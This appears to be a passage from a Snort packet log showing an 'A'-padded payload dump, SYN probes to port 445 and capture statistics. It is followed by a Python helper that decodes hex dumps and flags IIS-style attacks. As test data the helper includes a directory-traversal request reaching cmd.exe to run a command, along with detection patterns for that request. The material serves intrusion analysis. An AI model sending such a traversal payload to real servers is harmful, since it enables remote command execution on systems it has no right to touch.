41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0A  AAAAAAAAAAAAAAA.
0A                                               .
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

And now a final shot at 445:

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:21:49.678759 210.201.100.253:2105 -> 12.82.129.120:445
TCP TTL:112 TOS:0x0 ID:28584 IpLen:20 DgmLen:48 DF
******S* Seq: 0xA9875CB9 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:21:52.959181 210.201.100.253:2105 -> 12.82.129.120:445
TCP TTL:112 TOS:0x0 ID:28770 IpLen:20 DgmLen:48 DF
******S* Seq: 0xA9875CB9 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:21:59.519825 210.201.100.253:2105 -> 12.82.129.120:445
TCP TTL:112 TOS:0x0 ID:28973 IpLen:20 DgmLen:48 DF
******S* Seq: 0xA9875CB9 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Snort processed 347 packets.
Breakdown by protocol:                Action Stats:
    TCP: 345        (99.424%)         ALERTS: 0
    UDP: 0          (0.000%)          LOGGED: 0
   ICMP: 2          (0.576%)          PASSED: 0
    ARP: 0          (0.000%)
   IPv6: 0          (0.000%)
    IPX: 0          (0.000%)
  OTHER: 0          (0.000%)
===============================================================================
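
Added example (not part of the original log, and not snort's rule logic): a small Python triage helper that rebuilds a request from the hex column of a dump like those above and decodes `%5c`/`%2f` before normalising the path, since only after decoding does the path visibly climb out of the web root. The function names, the finding labels and the `MAX_HOST` threshold are this example's own assumptions.

```python
import re
from urllib.parse import unquote
# Hex column of a payload row: up to 16 "XX " groups at the start of the line.
HEX_ROW = re.compile(r"(?:[0-9A-Fa-f]{2} ){1,16}")
REQ_LINE = re.compile(r"^(\S+) (.*) HTTP/\d\.\d\r?$")
ISAPI_EXT = (".ida", ".idq", ".printer")
MAX_HOST = 255  # assumed threshold: longest valid DNS name

def payload_from_dump(dump):
    """Rebuild payload bytes from hex+ASCII rows, reading only the hex column."""
    out = bytearray()
    for row in dump.strip().splitlines():
        m = HEX_ROW.match(row.strip() + " ")
        if m:
            out += bytes.fromhex(m.group(0))
    return bytes(out)

def classify(payload):
    """Return findings for one HTTP request (labels are this example's own)."""
    lines = payload.decode("latin-1").split("\n")
    m = REQ_LINE.match(lines[0])
    if not m:
        return ["malformed request line"]
    # Decode %5c / %2f first, then treat '\' as a separator, as Windows does.
    path = unquote(m.group(2).split("?", 1)[0]).replace("\\", "/").lower()
    depth = low = 0
    for seg in path.split("/"):
        depth += -1 if seg == ".." else (0 if seg in ("", ".") else 1)
        low = min(low, depth)  # below zero means the path left the web root
    found = ["traversal above web root"] if low < 0 else []
    if path.endswith("/cmd.exe"):
        found.append("cmd.exe access")
    found += ["ISAPI %s access" % ext for ext in ISAPI_EXT if path.endswith(ext)]
    for header in lines[1:]:
        name, _, value = header.partition(":")
        if name.strip().lower() == "host" and len(value.strip()) > MAX_HOST:
            found.append("oversized Host header (%d bytes)" % len(value.strip()))
    return found

# Payload rows copied from the 10:19:14 packet in the log above.
TRAVERSAL_DUMP = """
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
35 63 2E 2E 25 35 63 77 69 6E 6E 74 2F 73 79 73  5c..%5cwinnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 64 69 72 20 48 54 54 50 2F 31 2E  +dir dir HTTP/1.
30 0D 0A 0D 0A                                   0....
"""
if __name__ == "__main__":
    print(classify(payload_from_dump(TRAVERSAL_DUMP)))
```

A request such as `/a/../index.html`, which never leaves the web root, yields no findings, so the traversal check does not fire on every `..`.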